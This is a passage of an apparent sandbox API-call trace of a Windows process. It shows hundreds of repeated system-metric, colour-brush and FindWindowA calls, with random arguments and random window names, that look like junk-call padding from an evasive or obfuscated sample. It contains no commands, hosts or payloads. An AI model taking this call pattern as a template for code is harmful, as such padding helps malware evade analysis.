(lpClassName="8S4kwIgTxSl1C00GOzOLMrbAyfKUUTsGCoRblsaqv6UpdvNIsNrmwUlN5u9t3tgj2tusZBauF", lpWindowName="MeAjSWfchoZYFYZ5B6kzMCk8R6BEuZMrF6cI6NX8DYdD3ojxSnqPTGfRyilOYGxlSXPtLJboH") returned 0x0 [0309.086] GetLastError () returned 0x57 [0309.086] GetSystemMetrics (nIndex=38565743) returned 0 [0309.086] GetSysColorBrush (nIndex=74389722) returned 0x0 [0309.086] GetSystemMetrics (nIndex=62686755) returned 0 [0309.086] FindWindowA (lpClassName="5Ayy61leDYT3CEW8K69rklPGtfUR2IZ2mB1S7NLt2nQfj3SL3XByImciQTqVaAUnJvUmHVQGs", lpWindowName="CmZFOv1QDIIXJNZI95hFQr77BIElyct4Aj6PKnZpzRiKYpZgnSOKlq8AzrHqDoGL4RHyqyX3g") returned 0x0 [0309.086] FindWindowA (lpClassName="hmWvn7MIr9oDUTOX7NYEkZgzUny1swObdYSEvWRBLzZ02h67YrlvBndn4cXPaoaKk5lQn33hf", lpWindowName="TmvHeuSEBMSPh2Q6dQAjy4KjsfSXF4YP8arF3SLLny30KKziHtRbOE2u8qvJP3B6Uiu1gJ03O") returned 0x0 [0309.086] GetCurrentThreadId () returned 0xbe0 [0309.087] GetSystemMetrics (nIndex=26698727) returned 0 [0309.087] GetSysColorBrush (nIndex=63594545) returned 0x0 [0309.087] GetSystemMetrics (nIndex=89849559) returned 0 [0309.087] FindWindowA (lpClassName="UTjlTOSj3iH7JTRsbYH133TyWLIB4G3sV0ykPds7HX27KbNCCytJR8Cu6XFptEIP68v8ZdV60", lpWindowName="881nP7VxEE4FdgcL9fOPyc98bI89qTPFtysL1Q4GTOPwD7kkqPqQ5PNEEfuTlCH9WpIYaPHWf") returned 0x0 [0309.087] FindWindowA (lpClassName="r7J1hAkTkUFvMA0OSa91e9gqVNBeg10gAI4OMrxF2ltRPWacKwhzQyw8byxIFwOQfxFYy0quu", lpWindowName="GXAPZHAD2vQkWrpqiwdo3Hrdt6z3lSTpgTpRpRVcwo6HM8uA8D9eE4ZADtmvWvN20LBHSkD6q") returned 0x0 [0309.087] GetCurrentThreadId () returned 0xbe0 [0309.087] GetSystemMetrics (nIndex=29688653) returned 0 [0309.087] GetSysColorBrush (nIndex=99996259) returned 0x0 [0309.087] GetSystemMetrics (nIndex=63486878) returned 0 [0309.087] FindWindowA (lpClassName="jBQjgnZSCe8nPQHnppZqt456uNhaAAZ7eJqXZMwECM9T0ci76RojHkpC99IR3WsIMd3jKuWwP", lpWindowName="71MRVOgDko8fnPYlapdvxlUsBH29Cm3ORYkfrjRZDdw6LcpX33e1IOwWR2uaAtZVB5yi9ijSA") returned 0x0 [0309.087] FindWindowA (lpClassName="hTmfAUKYckdKB9Ppfr6SkbeR8PKPlKtGBlyLUlctAOGXldP7MVJKo22zHcL8AII08n8YXDzJF", lpWindowName="swERoC0nE0pAli9Mk6pyZdABIGpASsMZ6uUeHJj8Ut6sSUOT0ouihnKJGjkvaPWolzchUSmJq") returned 0x0 [0309.087] GetLastError () returned 0x57 [0309.087] GetSystemMetrics (nIndex=36799342) returned 0 [0309.088] GetSysColorBrush (nIndex=26263233) returned 0x0 [0309.088] GetSystemMetrics (nIndex=95693638) returned 0 [0309.088] FindWindowA (lpClassName="qabztw5K1eD28Kin4mMxkcNZnWrc6hIXQdczX4fr0RMtivVlvkI3S1WSxzzthFYqGEdkVpeKg", lpWindowName="G35SqTGtifPRHmoGrgKq6MbYsSXvy60MjweSbK31tz14EbA1KG3aMSFgDmnfMwafStMicLMPC") returned 0x0 [0309.088] FindWindowA (lpClassName="rAnGePtx5v3gYKbBkp7iE8TLmAZusXVJpKqtgPAOg1vriJN04X29XdBh8j0SCA0zKFZdSKQc5", lpWindowName="HaJ5P1fJXE0YMq1we9QL2rKEs8yKDAVn3QLJwWy0vNKb4LTfLMMLq080gXW8zW5v6qCQNwWaE") returned 0x0 [0309.088] GetConsoleWindow () returned 0x0 [0309.088] GetSystemMetrics (nIndex=86427628) returned 0 [0309.088] GetSysColorBrush (nIndex=56254684) returned 0x0 [0309.088] GetSystemMetrics (nIndex=78529958) returned 0 [0309.088] FindWindowA (lpClassName="GJhxWkhVYO3dJfBuCov1eETvOmdRXXNsyE4NHRkTZCBldIkbSUz2k4XdH9VxSffSaITvgEsji", lpWindowName="ykKPltKud5EUWDutAgMVsvmUM03YmjIqtYFpEFljgwsA1AnevjPJC0d543tUYLjC0XVLuq9Ca") returned 0x0 [0309.088] FindWindowA (lpClassName="tm9WgMaF0mJKATWd43OflAQsoC7WO95efK2h3B98kTDHqyzKXoJMFchjR1wTYI67ekrUydLRJ", lpWindowName="eOpxcfBn4tzYABythRDUSLUcbCkFeXVwVQZaOA2jb1NDCX3vP20n39X6hhgnz4Mf1it18OLKd") returned 0x0 [0309.089] GetConsoleWindow () returned 0x0 [0309.089] GetSystemMetrics (nIndex=59854858) returned 0 [0309.089] GetSysColorBrush (nIndex=65636487) returned 0x0 [0309.089] GetSystemMetrics (nIndex=87723495) returned 0 [0309.089] FindWindowA (lpClassName="NaQPFKnSJuhqhH2WlcvyL4MAeQXggMnn79XAVJRrz1uBdbraRvC4iU1b6GvS1TiZMqvUrwcY7", lpWindowName="XFyxfRWIz9RwJakyvPmMoLBCRyp0qZbXHjtanzWWpCmfLf8hgMcVOxm7E0c9GUa8m6xqqEZ1E") returned 0x0 [0309.090] FindWindowA (lpClassName="KWTSqZTqOpaZDAqyRvJykTwFn3VsamFkqU1BcDuG07mjjq873tLM70Rm3tBHYf2FpMSsvHgod", lpWindowName="RJCXTNIfkulpeHgd1xYctR9RF3YxVeBJKYQu7A0XTaehlb8tRbhXVz9Az1I6BDvjwRgw6eX3a") returned 0x0 [0309.090] GetLastError () returned 0x57 [0309.090] GetSystemMetrics (nIndex=85638769) returned 0 [0309.090] GetSysColorBrush (nIndex=58883683) returned 0x0 [0309.090] GetSystemMetrics (nIndex=35439496) returned 0 [0309.090] FindWindowA (lpClassName="2hXyhlbqHeXKIYpOhzGZdGTzkPJe5AhAzvRdS9AaopPbPCxcxwTJIK38Dwmj69IK6KVxSN2yF", lpWindowName="kY8vbduFDFDHnZw3L1gm3H3VlGaUSvXonVZYjXaRgVNcJNzs08I7m4baYXjmxEHysOozZhzLj") returned 0x0 [0309.091] FindWindowA (lpClassName="soZncwBZWwjV3ZoDNJq8VJQUEOLJ8jECD92Bxch5N00ZEPdi8nfR9Od6xmldTHodT9cZ93mGp", lpWindowName="0SCl9nTdejMgZRlccTGX8vuKrACuTi9DM5uXp9fEKZABTNEQDgsYmP69ydQsKCjSE1FtVosqE") returned 0x0 [0309.091] GetCurrentThreadId () returned 0xbe0 [0309.091] GetSystemMetrics (nIndex=29846425) returned 0 [0309.091] GetSysColorBrush (nIndex=22435252) returned 0x0 [0309.091] GetSystemMetrics (nIndex=93758833) returned 0 [0309.091] FindWindowA (lpClassName="NZSlQiFqDMeb4hgxaWXxsxi3ACh0XXdea2vQfNw0KkibxehT3v5G2OhZgKZmCVSQ9iCvUX1zC", lpWindowName="bgtUaYhSJcgVSEe4d3mbHE3wyiGOft3KmuvFnijwndit6Bb5rW1ssFwxwZrptnzsTGlZHvojW") returned 0x0 [0309.091] FindWindowA (lpClassName="S3mPW6Yl2M9LhIU3FqTyDvZdPUBXCBZ37CFjIy9znmJIgWyT7YIgH05yfrCMvfoH1VDKMYcf1", lpWindowName="N8tTeVZOXj6Sj9AMQKHQNTkRuv0HclWhC9NY7bxX4xfkPrCtcI90Gp8YjRnkbQUJSCLwxsz3z") returned 0x0 [0309.092] GetCurrentThreadId () returned 0xbe0 [0309.092] GetSystemMetrics (nIndex=92884854) returned 0 [0309.092] GetSysColorBrush (nIndex=98759358) returned 0x0 [0309.092] GetSystemMetrics (nIndex=47372279) returned 0 [0309.092] FindWindowA (lpClassName="cdbhY3sPWbgPei2Rv4zNEaZDFtvsXZw234XoJil2JPwKFB81iFPt8VwYU9KSTc7TxJS5fgjZI", lpWindowName="EQxiTmCX4VVSgoKEVwwgXEGiQUNloYdC41w2UFYwoXBcjNemZauOR03U9ph3iHa1QFt7EeMp9") returned 0x0 [0309.093] FindWindowA (lpClassName="joTD3Roe9tUhzNCjFkhMJ9N1XXwN9r6Mjb526TR5xScJ1D4VjfrfwmOZGylOWSPdkICuBVbdX", lpWindowName="wWsOrkBPg1kIAEXDdao2rPY9Tmtf4IA5WaZ8awIzaTgyKnutVL7pdQQGnJwoIY54dGi6BxMDm") returned 0x0 [0309.093] GetCurrentThreadId () returned 0xbe0 [0309.093] GetSystemMetrics (nIndex=47273846) returned 0 [0309.093] GetSysColorBrush (nIndex=39469242) returned 0x0 [0309.093] GetSystemMetrics (nIndex=95729328) returned 0 [0309.093] FindWindowA (lpClassName="0synipUKG3NoPJ53xAdfUxcPu6Q5IJB1U2zn9kaY4mOsN03T3z4D5HTaYd7tFsR0FvWCDz06y", lpWindowName="oyfsRaUwIQjMDtCJjXwy5PcXLicsSIwDbDSNVufCXt5NWzVipntaBawfSWL3TtuQP2t0APmhI") returned 0x0 [0309.093] FindWindowA (lpClassName="hzxfz0STGR3su0HxcrqCQMsVUX4jF7ZYNRVdoV5Y4fYPkSeGjxoXjAGxtI8m19vmCZI9YZU23", lpWindowName="o4opxOK84fta7oiKuQlPhKATD4GMsKNVH7Wfi1zg5YOvtVkrnzspgnKy5tETPiUphdxe2Scrb") returned 0x0 [0309.094] GetLastError () returned 0x57 [0309.094] GetSystemMetrics (nIndex=52948745) returned 0 [0309.094] GetSysColorBrush (nIndex=37668426) returned 0x0 [0309.094] GetSystemMetrics (nIndex=24465466) returned 0 [0309.094] FindWindowA (lpClassName="EWq1n8pIK3y8PebTkARVZR0DshPvYlRIDNgIaW8hqeueIFFc8Ah5QrfAPnUt1fm1jomYqLMlf", lpWindowName="1JyHaoYLHGNfzs4hiV6eYBQFaJ81eyTn3iSAM5r4R3MBFj8vRrqVxLAOy99exXT5bbbvHYEMy") returned 0x0 [0309.094] FindWindowA (lpClassName="N8p5O7p6UMlRxwQ0gpLRWaNEKvGkmY5kinZQ6XeFHZl1F6yKWN9wGTC2s6aatIYHgVdPedIoA", lpWindowName="qg101S7HPjM8oTPRr0e6FAzwzAENDGJVm9kFydOVVq0pUZ63bMA4rciLwRDfospupEkLJQ65r") returned 0x0 [0309.127] GetCurrentProcessId () returned 0xf94 [0309.127] GetSystemMetrics (nIndex=35852596) returned 0 [0309.127] GetSysColorBrush (nIndex=66287694) returned 0x0 [0309.127] GetSystemMetrics (nIndex=22429386) returned 0 [0309.127] FindWindowA (lpClassName="8ksHpDhFkSP3msI6XZMEwGusP3SjwgyDrgY9TcX1dY3RIctvUY16XSOiiZqTo9VxlSDaEFPgT", lpWindowName="hS46TFudBBKa5jiZPnCEDzHOTJcJwef0hg0ANLZMur7bed0KPb9PBkwzFeaKQbIbSBRl1scEx") returned 0x0 [0309.127] FindWindowA (lpClassName="0AiMpIzXoaswtGzU6wy9iUxz2Y2fKO8c7WYFWJhnUqUn6TDQvVpDlfyXC9nuPUABJkOmfySds", lpWindowName="s79ax7uR5QwN3gcifOpKg0RM3RXuN3aKtr60OvEXdaEYS8fsa4aLEli2Yl4L4vSa6xKTm1QJJ") returned 0x0 [0309.128] GetConsoleWindow () returned 0x0 [0309.128] GetSystemMetrics (nIndex=77668729) returned 0 [0309.128] GetSysColorBrush (nIndex=48534767) returned 0x0 [0309.128] GetSystemMetrics (nIndex=79774727) returned 0 [0309.128] FindWindowA (lpClassName="9RxG5WLsE9f6ebsOTWbp8XIDgvWpgXGELxdEQOmiogcVQq7sZe2nsaw4Ee2fgWq21JU2Idl6E", lpWindowName="3S2GU59vVJVXO6aMx3QRb0xN2pI1y7pEgBpN6u9bEKwO76uAIrnHfcFYWeSgMJM08iYfRYDLB") returned 0x0 [0309.128] FindWindowA (lpClassName="CvxQXSd1tY9cmDzPdSIiwEtLHXVZsObjhSXpcfJ2aHgWeujLwzo8X96pNpLPnVhxSPRW0M25Q", lpWindowName="5F6wvy5JvKJa2djXrvvFDy6HLhk91Rggxp9WW1wYsVx5W0yG83ALuOHiI6yefMSqsKTlXhBhU") returned 0x0 [0309.128] GetLastError () returned 0x57 [0309.128] GetSystemMetrics (nIndex=38732793) returned 0 [0309.128] GetSysColorBrush (nIndex=85527272) returned 0x0 [0309.128] GetSystemMetrics (nIndex=62798948) returned 0 [0309.128] FindWindowA (lpClassName="0QpZG9Uv54oGDDU5Qe8dZhX63rnPGGKZPb8jpgBfQtNRRxJ7Gc2dwPMY20H08Xwi0at2jVEr6", lpWindowName="diFwB4sAfmWR9Y4CP51DYzsDa6KVaDXAq6SHALXYpYf1bCi3eM6KWvIAASKJEO4Lb4bWozXys") returned 0x0 [0309.129] FindWindowA (lpClassName="4bVrNFVCYsA4K3Z6qeY0dLL7FNP3EehjTFOB7BoSptqXhGNFohRDz6vZVDReB6mxB0ZRaxbIR", lpWindowName="ihUPEYYFiiHS6HDN1kvhys8yv2BTixWgo5eeCVjy4wOCWaqQ12lrf58Tp9dlF4BG5xMLLGybR") returned 0x0 [0309.129] GetLastError () returned 0x57 [0309.129] GetSystemMetrics (nIndex=67899336) returned 0 [0309.129] GetSysColorBrush (nIndex=97632773) returned 0x0 [0309.130] GetSystemMetrics (nIndex=43824689) returned 0 [0309.130] FindWindowA (lpClassName="a7ZYwr4aTG2C7Qia3eeMydkfj2i13Pl32CTfFJ8zmglOu2GohPm2YQox9Kos6Ydc0ahMkQYpM", lpWindowName="qrMZEYnTQmK7lIhDLqGDyxsvVr0wSSm5SgMHz26YjkS8taguJgNakyOO9TJXQXpS68k8Rbkxg") returned 0x0 [0309.130] FindWindowA (lpClassName="4IzwW8GrZPpwYWcp6k8cactZ8rqYI0jHSGvY134iPlCeClSxjb7OdAsExNBNcNDG5OqjGagEu", lpWindowName="biZj9SKb47QxlfFjnWpMXD22rqy3wHKdP8es092dAcDHXjkOCjQJ0cyIXmWiNHDahXnZfIpnL") returned 0x0 [0309.131] GetConsoleWindow () returned 0x0 [0309.139] GetSystemMetrics (nIndex=33948739) returned 0 [0309.140] GetSysColorBrush (nIndex=77867297) returned 0x0 [0309.140] GetSystemMetrics (nIndex=62826239) returned 0 [0309.140] FindWindowA (lpClassName="8bIc6hBsZXDwghPpNQni4Lq5Tx60luda1xIhy5fBefyAMnFn1xH2rTdqgIkaE2HxsdX1KlWXt", lpWindowName="uFoiMD1uTyJ7xgEfAATAO8kk8zTp0KVDibIRxxEqm7GYOpb2ewRo8LXY4dLywY6pHUqINoKRX") returned 0x0 [0309.141] FindWindowA (lpClassName="qyiCvQEAVXHGUEnG96tWCTpbJXpgSkSjBb8QRKGcEr9EjJT8GSvwdkPZXdphPRP5Ylz86bsQe", lpWindowName="qtyKwsZSva2AIvKLuvHJniJMmpQNGl6WXVW0idt8Zaj95SzkXT8ZpDQjl947fr7MoUF0Flcbt") returned 0x0 [0309.141] GetCurrentProcessId () returned 0xf94 [0309.141] GetSystemMetrics (nIndex=63588927) returned 0 [0309.141] GetSysColorBrush (nIndex=47463634) returned 0x0 [0309.141] GetSystemMetrics (nIndex=73759854) returned 0 [0309.141] FindWindowA (lpClassName="C32OM1JOkib5I5qY2lFhXWGXsC6Pt0GIsFTnTZSg06VDgG1FdC5dyGE2qW4HvjBRZVStdwwCU", lpWindowName="j711hzV7fdWFcRBREldWDBwkevQR4yfm8dE4WK2uFXHuibsiEsoM3wStIAQI66y2qtuF65y5q") returned 0x0 [0309.141] FindWindowA (lpClassName="O3NPVQNjnEo925b76we7p5ieeI8tYWmFGzuR3cRjrXkzmQa4DXFe9OH46yIUFl0XjDqDsE9G4", lpWindowName="zCgWm0oojRZf5LDFzwJsEkG1BZUdWp6sah2jzzjFWtxsrDzQOU2vYTHHoJCDeC83luem7raLU") returned 0x0 [0309.142] GetLastError () returned 0x57 [0309.142] GetSystemMetrics (nIndex=29359668) returned 0 [0309.142] GetSysColorBrush (nIndex=53763587) returned 0x0 [0309.142] GetSystemMetrics (nIndex=24248732) returned 0 [0309.142] FindWindowA (lpClassName="3WfdXCHDPQPeQ8Hzynx6mMA0N7j95k7Ai4Z93xaG0PEPp1ZNxGFFhR1QMD6Wuzlezf98VVWnE", lpWindowName="YKI4JSgVS0qZFUD7BQv0TPW4sVCdFsdgaixwB9dyCCsn00KTMZMvbcowhjvKL4au1o6yALKxH") returned 0x0 [0309.142] FindWindowA (lpClassName="R85PlbWG9mVUhDpTNHVcrOHYmmgZ0TwQHuylQvPuof9VjztUg5Wq0L8hVnUsngdq6ON7GZ3fb", lpWindowName="zSJsfumcgLBzVfQv2MeiKlEOowgmHlpblyDwOvqaIegkroPTZZPyeZjCzIKAtaBnf44veM0gC") returned 0x0 [0309.142] GetCurrentProcessId () returned 0xf94 [0309.142] GetSystemMetrics (nIndex=97524645) returned 0 [0309.142] GetSysColorBrush (nIndex=56365699) returned 0x0 [0309.143] GetSystemMetrics (nIndex=75246785) returned 0 [0309.143] FindWindowA (lpClassName="p5rVitT7qS6HVFpazsCxRBW8B9EZF9cieLr3N4dvVM24tZMkytGETz3g9YtwPrNZH0cPG0rNl", lpWindowName="m83uv8WaDDx47SfOAI8xkpL5gdRpIXJ6ztcvK8XzZbBbDr9YDQSYwvlefn03A5SQmAsorh9hw") returned 0x0 [0309.143] FindWindowA (lpClassName="TY1SH4aSk6eXu8RAumtZfM15K4r9Xc2PkfrYQWDPotZIWI7qF4VkHbXt18J7NQQkGwrJFxR6N", lpWindowName="jM2zbncOGIWhSQHa53zPevMKwfbxzgyMxVMMkTRm0MKHCqzT0P5A2R8GpaaiWPLwDTAgZw3Yz") returned 0x0 [0309.143] GetCurrentThreadId () returned 0xbe0 [0309.143] GetSystemMetrics (nIndex=68439892) returned 0 [0309.143] GetSysColorBrush (nIndex=33854283) returned 0x0 [0309.143] GetSystemMetrics (nIndex=62882384) returned 0 [0309.143] FindWindowA (lpClassName="BsORXtJTrPEvpoeCYHjZQnWIgNsQjiC0Y82GV5gMZ8pHG8vmB5uwGp1a83XIdD9d9dqvxWr1i", lpWindowName="SVgHCispIM9oCIpxKMcjIlYnFhGiU3Q1VBLAljpV00j6Gx2xDOyFyOIb5anh2CV0AgLTfbnLj") returned 0x0 [0309.143] FindWindowA (lpClassName="UvJTquguZlHg4yALGqKDZGxoOe4ZYyjogess9IUg7z2jqhEfxVJqn0Hiqfbroh4tkBMlNG8fs", lpWindowName="m9qx2ctP2HfowD8t408oH1PmUbEzvO2D3GWHdcVy3pukiyS5crtybk1crWfrFTqQfhtdHTwRW") returned 0x0 [0309.143] GetCurrentThreadId () returned 0xbe0 [0309.143] GetSystemMetrics (nIndex=97693822) returned 0 [0309.143] GetSysColorBrush (nIndex=75635974) returned 0x0 [0309.143] GetSystemMetrics (nIndex=53825274) returned 0 [0309.143] FindWindowA (lpClassName="hREY7DLgjznUiKDG0mzmTJq4s8uQ5NLHrYzX4l28T8yGh5UaY0bytXhWmqflCvCViHKEtXTFK", lpWindowName="STB2EN0BCAquxpxf2AzCDJAs36iL06SiqRTTdrDnouIVLqOmUdgZXtS53IvDgj5ogqoUe3CHa") returned 0x0 [0309.144] FindWindowA (lpClassName="Wgxsxcwv8s0G9s83W4BNn3SyYcW0uxdCAB7nmt6658emjMaKXwNEFXgz2lIG41uJDsKLEubuH", lpWindowName="DPCZEYIFmh2KNfmJlqzWBvCXJxhZFaBpm1eHxtWPB1ItdsWlhi1vhT8FDDaKoHW2rLc6AvePJ") returned 0x0 [0309.144] GetCurrentThreadId () returned 0xbe0 [0309.144] GetSystemMetrics (nIndex=62248436) returned 0 [0309.144] GetSysColorBrush (nIndex=74734444) returned 0x0 [0309.144] GetSystemMetrics (nIndex=64695566) returned 0 [0309.144] FindWindowA (lpClassName="Etz2meRpfwY3Rb07xoQ3jKRkDmupQrNsL1TmvYOZ5bL8lGfUOE5CIZLk4Nnar1jbJBuF9sP2w", lpWindowName="WU1bTwDwHKElzSSjBbvvi6X9ISz24DSpKSKQEDc8MolsspWqMwo2iSKoUn9jvXWnvbW0F0GH0") returned 0x0 [0309.144] FindWindowA (lpClassName="EBt9S4DDQn19BblMuJs5c7LaHJ16TfkhzGDow7MneyNKzVlqet7FFsSNUVpy2I03lOJjOpuPR", lpWindowName="eNks7VZXGlnNqrOvpwNoiWqo3oHv84DQbhKSq6klv47OZi9wBBJYKEnxxuV1mj3g9vBJ2LTPn") returned 0x0 [0309.144] GetCurrentProcessId () returned 0xf94 [0309.144] GetSystemMetrics (nIndex=23888769) returned 0 [0309.144] GetSysColorBrush (nIndex=75546458) returned 0x0 [0309.144] GetSystemMetrics (nIndex=83544733) returned 0 [0309.144] FindWindowA (lpClassName="vxr08IES8jYNcr34xTft0d7ghZBWAv7vOaXryg6JJ69ehAZ8Ki063ra5c2DUIIq03fCdDDxaA", lpWindowName="PgWc6rzt26xoiruLrwxOPOKHqlvPsLsT7izFsP1j106ZpPpKU04KOk5Ua7LIrTuVH18CBktRr") returned 0x0 [0309.144] FindWindowA (lpClassName="hFO98XklvxFefZOTsKRPeWWsM3OLWrHd54Wg8NLSJh1DSdB7XbnwEP4cmXFQCLWMLzbV9NINA", lpWindowName="RWGap93S25ue9CHBn2TeWlQjRFp6NMgQ3msl2PbixNNgVGNTDB2hvzsojL6BYOXXsqwblyU7a") returned 0x0 [0309.144] GetLastError () returned 0x57 [0309.145] GetSystemMetrics (nIndex=66367968) returned 0 [0309.145] GetSysColorBrush (nIndex=35353478) returned 0x0 [0309.145] GetSystemMetrics (nIndex=29987973) returned 0 [0309.145] FindWindowA (lpClassName="dJcsdaMWTYl813lLKht9uAei8rVtXJOAY0Q0nty9AGV3sUy2pvuLt3xiHftn6bToDkmNAP2sa", lpWindowName="3iHjRVj1XkJTGzE0j64tbu25jjZXVOeAzwnAbjJVMzP0MMHqzIctsRDuwHN65dwg6TacFe8b9") returned 0x0 [0309.145] FindWindowA (lpClassName="CIbMJM2jDOyQWPJR2v94gbqtMrEOZtiaW19dbQQTj1beZjVLzgDozOFU45xIJwqk3ZRWZ4KGn", lpWindowName="wq8azNDkAqF0sTAMG6DFeM58ZjzJuQpSv9lVUkEBM4m2s0GufdkpgZgQIUlEhtGZw2HsSkaFh") returned 0x0 [0309.145] GetLastError () returned 0x57 [0309.145] GetSystemMetrics (nIndex=95976339) returned 0 [0309.145] GetSysColorBrush (nIndex=62885834) returned 0x0 [0309.145] GetSystemMetrics (nIndex=22495356) returned 0 [0309.145] FindWindowA (lpClassName="EurTVeLZxQhOFrvVD5x00LFEPhJON60tmzqU5sNZ8KXPYCygq74cjIhqneoAFEjoU7kdsPcw4", lpWindowName="t7j7MGSqqiQRFfZ82BUw5rnb6hFmvUR6NZo9omhFFnpl83MXmakYTTOrAd689CmHTtydggFaf") returned 0x0 [0309.146] FindWindowA (lpClassName="xErGsRiYKLXdQrqTDb3XUV4HH6Nb2j4xTLIs01QcCwnyGeJ4V5IjARNj3Kepf3CmNa0vyQmHM", lpWindowName="UfwJKotgKDMCDN1yCebDYfJ9zyHTbCT79XDtdRKA4zXniEa8uj4ePKTKZu5ziMWLCVnHxwITN") returned 0x0 [0309.146] GetLastError () returned 0x57 [0309.146] GetSystemMetrics (nIndex=26748836) returned 0 [0309.146] GetSysColorBrush (nIndex=67593828) returned 0x0 [0309.146] GetSystemMetrics (nIndex=56239957) returned 0 [0309.146] FindWindowA (lpClassName="4uis42nxhWgRrdYJlqOoUdDhD6Z6bj8qIiwmZrSFT83WXNgkENYKOHSYRyRzUVBucWbP9EVgm", lpWindowName="4tHEtTWQ8ZJX4nopK0o5sJmkTwnYMwZakBN0WKu601Va9BBBjxNCNM5C4gNo9LtxEO6FqsGEr") returned 0x0 [0309.146] FindWindowA (lpClassName="hBy6oisO1wyI3nNDSdo7stJKiya5KCdJ6qQw9f0QNQebqDwFfmvPhGlhvBXzxaOIRk6uTeNuY", lpWindowName="vj7aNVCESml51o0AagGwTPE1owHmNu5jZuidK4jDXvhyeUzfKtepCoHnTwzMAfXEYbKnYyCku") returned 0x0 [0309.146] GetConsoleWindow () returned 0x0 [0309.146] GetSystemMetrics (nIndex=63845795) returned 0 [0309.146] GetSysColorBrush (nIndex=37844264) returned 0x0 [0309.146] GetSystemMetrics (nIndex=84475286) returned 0 [0309.146] FindWindowA (lpClassName="pVS51yOdk7N0SWxx1SpToxqfaMeu3B5sybEhceRawHjmytCECYVFbt5ZKdx64KdN9CVkLUEVZ", lpWindowName="KZ35zGr1Zrl25aeXGtvXptI68kTbSEJebcUdDgDLuuX6eFKu9x3MELFsUDPUOrnUZi57ohfe8") returned 0x0 [0309.146] FindWindowA (lpClassName="uT65bvePvrQoDTciQ1Ee3vSx7pvtDamdMz5FGsDMLM1dtVjhna5fc39NL6GVDj4ABgYMsX0ld", lpWindowName="176rBfgiuujLnk9w1iPmkx9SSSSgkEd59kUeriQvdOKsuiWmW8LodasTrC0jfAtIJLQZuRiZ8") returned 0x0 [0309.147] GetCurrentProcessId () returned 0xf94 [0309.147] GetSystemMetrics (nIndex=35766643) returned 0 [0309.147] GetSysColorBrush (nIndex=95544898) returned 0x0 [0309.147] GetSystemMetrics (nIndex=46624276) returned 0 [0309.147] FindWindowA (lpClassName="fr3WnGp1F3l0ZgsoPd0MaPr0hY9nGV2lhd3N2F7gibJHYmvyuqmCygnUvzwgQJOVOp6EN9jNT", lpWindowName="XG2ELkwqthl2BTI2sBpKpUoLVx6d96DOcEKP8TG1ZsARy6fdSqo8QplLXW00DsDvUDu5n3fWT") returned 0x0 [0309.147] FindWindowA (lpClassName="KlXfJJbSvvp9aTfOFscrkOSM82QHPP8EURqqTht1dDqCP0tKyTvJuqTxVxocCub5aYJGlJJQ5", lpWindowName="yNhc0g1ZxS0ObYc4WGkUU8fzGnvwA60YgUoj75Lrn8Ak38O2OMJPd3ZcpARQJpIKmaoT7DkWk") returned 0x0 [0309.147] GetConsoleWindow () returned 0x0 [0309.147] GetSystemMetrics (nIndex=96298989) returned 0 [0309.147] GetSysColorBrush (nIndex=85657742) returned 0x0 [0309.147] GetSystemMetrics (nIndex=54433279) returned 0 [0309.147] FindWindowA (lpClassName="aena9fudgYixyEV6HnO6J3WSgsAvKPccUC5BwSGhuGWhkt2QEsQK0QCitZsofi3jZFZpay84i", lpWindowName="sXF9EU05Di1htxkgej0WCKVjd1piJE6N0SSRax0vqizV0r1cM7YVGFFUvfQwvsLv11v061W4r") returned 0x0 [0309.147] FindWindowA (lpClassName="hiTQ6Eo6WgiA1phRXnkAh4pEgsbKhp4AxqrMrhGWKVFekasCOBFPqoAvJ9me2vpWhStPyMqZ4", lpWindowName="KV3YsJwRYWnirT1ffk7DClDzS3jCxU98Smd9Xt3LeMfwQBtyp0kLIXrxMVbCn7dAjhfZRk0Pw") returned 0x0 [0309.148] GetCurrentProcessId () returned 0xf94 [0309.148] GetSystemMetrics (nIndex=54479665) returned 0 [0309.148] GetSysColorBrush (nIndex=48952368) returned 0x0 [0309.148] GetSystemMetrics (nIndex=74342392) returned 0 [0309.148] FindWindowA (lpClassName="lDeLSbT8SbJUKj1ZKC6G9WhrqAxIBM60WCp2DiULDDM2PSDQufYFl1qmAcap6kImqPV9lJ6mK", lpWindowName="nWQEQ5z3jJqwRbsxAd8Z9TtX7E4vKSAv9mhXDR4oZndjB0lXa56IygOveMk3XVP6FIpCqvJRI") returned 0x0 [0309.148] FindWindowA (lpClassName="xk6j2djKHyuJacrsrrSEcAA23TT4lqSjabscU6u5qh6pYlLCepT0NLnfF82RpE4N4wzIw7mIu", lpWindowName="kkHd5bOOxPVtJTpunwyjvMJUH3LIw9UEbP7RzEbycopLeppkQUzLhSC7qpWfcoaEnphSwOCmm") returned 0x0 [0309.148] GetConsoleWindow () returned 0x0 [0309.148] GetSystemMetrics (nIndex=27988927) returned 0 [0309.148] GetSysColorBrush (nIndex=22752567) returned 0x0 [0309.148] GetSystemMetrics (nIndex=65383667) returned 0 [0309.148] FindWindowA (lpClassName="A9TFMkSx0GiXrHRlJanjq0WWRhz4LmXXNe0IVr0WZgdcVpEshVNnfMxnz60a8Na1Czu2zzye6", lpWindowName="4JObhcHGs86ArzLZ8oo75Z0ZnlkW5zMRYLlgp6I4W3SGt404cFNGvDWNpuf4EnUxk5aJFukwt") returned 0x0 [0309.148] FindWindowA (lpClassName="xeNsXhNyhRAk2Yr0f3PRAzFbgAGWIiQnbKHBgu1S4rMubDIag95oikAosBSsHDBrmY6WgBF8b", lpWindowName="Ox341Bxs0fHkKTKPGNKtLHKqlVFDXb7L9oTrdlAriOnu1PtXKvxboLNZgoNxpjfCufA4fTDnt") returned 0x0 [0309.148] GetLastError () returned 0x57 [0309.148] GetSystemMetrics (nIndex=67929332) returned 0 [0309.148] GetSysColorBrush (nIndex=75694797) returned 0x0 [0309.148] GetSystemMetrics (nIndex=96593288) returned 0 [0309.149] FindWindowA (lpClassName="da1xUzI0ME3ABtD9qKtdI0QMVCmu1iCGwup5T27ErbX9BUP7DwNoVxWOiZJWAKZnfFHwvZ6G6", lpWindowName="7KAhVhj1I9xdTmvk9VjDGKO3yQh0BmWdDkIxxC4qZpw8aaKJTJSx3rA5CnTUKgyK5QQwjjaF8") returned 0x0 [0309.149] FindWindowA (lpClassName="4IzRBumJa2quG6a7OpIfew6SsTWnEkJuBeTkvcVVmsAqZ8XCKa1qCAZ5Cbg83fN04NdvWeDKc", lpWindowName="M8xfLX6eiFU4fBatCfz4rGprcJoUf1qP4HzdNRASN3C6XPWw35bxEZz7saPfzeOkZ4R02v5XM") returned 0x0 [0309.149] GetCurrentThreadId () returned 0xbe0 [0309.149] GetSystemMetrics (nIndex=49254792) returned 0 [0309.149] GetSysColorBrush (nIndex=94747792) returned 0x0 